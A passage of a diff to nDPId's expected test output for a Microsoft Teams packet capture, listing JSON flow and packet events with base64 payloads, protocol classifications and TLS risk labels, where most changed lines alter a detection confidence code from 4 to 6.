+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2511,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693611,"flow_last_seen":1587041693611,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693611,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50017,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 00689{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2515,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1587041693625,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":1587041693625,"pkt":"KDc3AG3IEBMx8Tl2CABFAADXVxUAAGwRBmU0cvp7wKgBBg2Ww3QAwyhaARMApyESpEI9x0RmdejywONbcT4ADwAEcsZLxoAIAAQAAAAGAAkAPQAABAFUaGUgcmVxdWVzdCBkaWQgbm90IGNvbnRhaW4gYSBNZXNzYWdlLUludGVncml0eSBhdHRyaWJ1dGUADgAIAAENljRy+okAFAAUPK7\/QeTw1Z9oICgNLxST+LDzEgAAFQAKInJ0Y21lZGlhIgABAAgAAQ2YNHL6iYCVAAhb5VsGDC2J+oAgAAgAAc5scadqCg=="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2516,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1587041693628,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041693628,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0Nx9AAGwG5wg0cvp7wKgBBgG7w2XeqFvwXFlWKYAS\/\/\/MOwAAAgQFoAEDAwgBAQQC"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2517,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1587041693628,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041693628,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGSjTAqAEGNHL6e8NlAbtcWVYp3qhb8VAQIADs+gAA"} -00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2518,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693582,"flow_last_seen":1587041693628,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1587041693628,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2518,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693582,"flow_last_seen":1587041693628,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1587041693628,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2519,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1587041693640,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":195,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":195,"pkt_l4_len":161,"thread_ts_msec":1587041693640,"pkt":"KDc3AG3IEBMx8Tl2CABFAAC1fJUAAGwR4QY0cvp7wKgBBg2Ww2AAoaFUAQMAhSESpEIiL+\/H85JL0bmXJ+QADwAEcsZLxgANAAQAAAA8AAEACAABDZg0cvqNgAgABAAAAAaAIAAIAAHB1XGnagqAUAAYm3E8YjrBv7v21SN1g6+m0xjhRrQAAAAAgCIACTIuMC4xLjIxMQAQAAQAAC7gAAgAIK\/9w8VcH20Bp+o9r1mX6tB+MRypEJNYTX2DO\/tetQep"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2520,"source":"teams.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693654,"flow_last_seen":1587041693654,"flow_idle_time":200000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1587041693654,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50036,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2520,"source":"teams.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1587041693654,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":256,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":256,"pkt_l4_len":222,"thread_ts_msec":1587041693654,"pkt":"EBMx8Tl2KDc3AG3ICABFAADySXIAAEARP9\/AqAEGNHL6icN0DZYA3q9FAAMAwiESpELOvwn047sA+HEU4bYADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAKAlQAIW+VbBgwtifoAFAAUPK7\/QeTw1Z9oICgNLxST+LDzEgAAFQAKInJ0Y21lZGlhIgAGADgCAAAkkKDb2wHWGU3iFTe\/yZKgAzJzGvG+3Faa6DvVqwAAAAC\/cbJ2yXgTqN3v61y8eTonekzmPAAIACCU7UyKuDgKSJKUvk8SSs9ovhsGMp06Kok2oE1dFOuKzQ=="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2520,"source":"teams.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693654,"flow_last_seen":1587041693654,"flow_idle_time":200000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1587041693654,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50036,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2520,"source":"teams.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693654,"flow_last_seen":1587041693654,"flow_idle_time":200000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1587041693654,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50036,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 00690{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2521,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":1587041693658,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":1587041693658,"pkt":"KDc3AG3IEBMx8Tl2CABFAADXfJYAAGwR4NE0cvqNwKgBBg2Ww2EAw+F\/ARMApyESpELalY8VcoE3uJ+0vVMADwAEcsZLxoAIAAQAAAAGAAkAPQAABAFUaGUgcmVxdWVzdCBkaWQgbm90IGNvbnRhaW4gYSBNZXNzYWdlLUludGVncml0eSBhdHRyaWJ1dGUADgAIAAENljRy+o0AFAAUPpo\/SSn4PJAIkOO6zaqfvtmAt1IAFQAKInJ0Y21lZGlhIgABAAgAAQ2YNHL6jYCVAAiQUL8kDsWN+oAgAAgAAcwTcadqCg=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2525,"source":"teams.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693668,"flow_last_seen":1587041693668,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693668,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50037,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2525,"source":"teams.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1587041693668,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1587041693668,"pkt":"EBMx8Tl2KDc3AG3ICABFAABgYKIAAEARKUHAqAEGNHL6icN1DZYATE9EAAMAMCESpEJNv3gTxWrFDZ5wS8sADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAI="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2525,"source":"teams.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693668,"flow_last_seen":1587041693668,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693668,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50037,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2525,"source":"teams.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693668,"flow_last_seen":1587041693668,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693668,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50037,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00987{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2526,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1587041693582,"flow_last_seen":1587041693675,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1639,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1587041693675,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2542,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1587041693698,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":195,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":195,"pkt_l4_len":161,"thread_ts_msec":1587041693698,"pkt":"KDc3AG3IEBMx8Tl2CABFAAC1VxYAAGwRBoY0cvp7wKgBBg2Ww3QAoWPcAQMAhSESpELOvwn047sA+HEU4bYADwAEcsZLxgANAAQAAAA8AAEACAABDZg0cvqJgAgABAAAAAaAIAAIAAHObHGnagqAUAAYmiULR7BQSjV7GJ7mOy6WXuQ5anUAAAAAgCIACTIuMC4xLjIxMQAQAAQAAC7gAAgAIJWLEhTAIKUMzT0EuyGZ9cU94RPVJanGef0JixSMSj4H"} 00729{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2543,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":1587041693711,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":256,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":256,"pkt_l4_len":222,"thread_ts_msec":1587041693711,"pkt":"EBMx8Tl2KDc3AG3ICABFAADyfgoAAEARC0PAqAEGNHL6jcNhDZYA3rEpAAMAwiESpEJLDXUDhL3sfvdJg10ADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAKAlQAIkFC\/JA7FjfoAFAAUPpo\/SSn4PJAIkOO6zaqfvtmAt1IAFQAKInJ0Y21lZGlhIgAGADgCAAAkkKDb2wHWGU3iFTe\/yZKgAzJzGvG+3Faa6DvVqwAAAAC\/cbJ2yXgTqN3v61y8eTonekzmPAAIACBfcijkK3I1E6fsjRiPsKvs33Xfpf\/cKnDyh7VrIY168g=="} 00688{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2545,"source":"teams.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1587041693714,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":1587041693714,"pkt":"KDc3AG3IEBMx8Tl2CABFAADXVxcAAGwRBlU0cvqJwKgBBg2Ww3UAwwtKARMApyESpEJNv3gTxWrFDZ5wS8sADwAEcsZLxoAIAAQAAAAGAAkAPQAABAFUaGUgcmVxdWVzdCBkaWQgbm90IGNvbnRhaW4gYSBNZXNzYWdlLUludGVncml0eSBhdHRyaWJ1dGUADgAIAAENljRy+okAFAAUc60+h2VE9PTAWxn4K2V6NOmKA20AFQAKInJ0Y21lZGlhIgABAAgAAQ2YNHL6iYCVAAjDwJ1K7o6J+oAgAAgAAcBocadqCg=="} @@ -438,36 +446,37 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2562,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1587041693849,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041693849,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGSf7AqAEGNHL6mcN0AbuMksvlAAAAALAC\/\/8dvwAAAgQFtAEDAwUBAQgKMITaVwAAAAAEAgAA"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2564,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1587041693869,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041693869,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0nZxAAGwGgG40cvqYwKgBBgG7w17cXACa3TTJGIAS\/\/81\/QAAAgQFoAEDAwgBAQQC"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2565,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1587041693869,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041693869,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGShfAqAEGNHL6mMNeAbvdNMkY3FwAm1AQIABWvAAA"} -00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2566,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693828,"flow_last_seen":1587041693869,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1587041693869,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.152","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2566,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693828,"flow_last_seen":1587041693869,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1587041693869,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.152","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2567,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1587041693893,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041693893,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0NypAAGwG5t80cvqZwKgBBgG7w3QJhgXYjJLL5oAS\/\/9RUwAAAgQFoAEDAwgBAQQC"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2568,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1587041693893,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041693893,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGShbAqAEGNHL6mcN0AbuMksvmCYYF2VAQIAByEgAA"} -00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2569,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693849,"flow_last_seen":1587041693893,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1587041693893,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.153","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01500{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2585,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1587041693828,"flow_last_seen":1587041693913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6300,"flow_avg_l4_payload_len":450,"midstream":0,"thread_ts_msec":1587041693913,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.152","server_names":"tr.teams.microsoft.com,*.tr.teams.microsoft.com,turn.teams.microsoft.com,*.turn.teams.microsoft.com,*.relay.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 5","subjectDN":"CN=tr.teams.microsoft.com","fingerprint":"A7:90:8D:41:ED:24:D2:83:48:95:90:CE:18:D3:A6:C2:62:7A:07:75"}} -01500{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2603,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1587041693849,"flow_last_seen":1587041693938,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6300,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1587041693938,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.153","server_names":"tr.teams.microsoft.com,*.tr.teams.microsoft.com,turn.teams.microsoft.com,*.turn.teams.microsoft.com,*.relay.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 5","subjectDN":"CN=tr.teams.microsoft.com","fingerprint":"A7:90:8D:41:ED:24:D2:83:48:95:90:CE:18:D3:A6:C2:62:7A:07:75"}} +00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2569,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693849,"flow_last_seen":1587041693893,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1587041693893,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.153","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01500{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2585,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1587041693828,"flow_last_seen":1587041693913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6300,"flow_avg_l4_payload_len":450,"midstream":0,"thread_ts_msec":1587041693913,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.152","server_names":"tr.teams.microsoft.com,*.tr.teams.microsoft.com,turn.teams.microsoft.com,*.turn.teams.microsoft.com,*.relay.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 5","subjectDN":"CN=tr.teams.microsoft.com","fingerprint":"A7:90:8D:41:ED:24:D2:83:48:95:90:CE:18:D3:A6:C2:62:7A:07:75"}} +01500{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2603,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1587041693849,"flow_last_seen":1587041693938,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6300,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1587041693938,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": 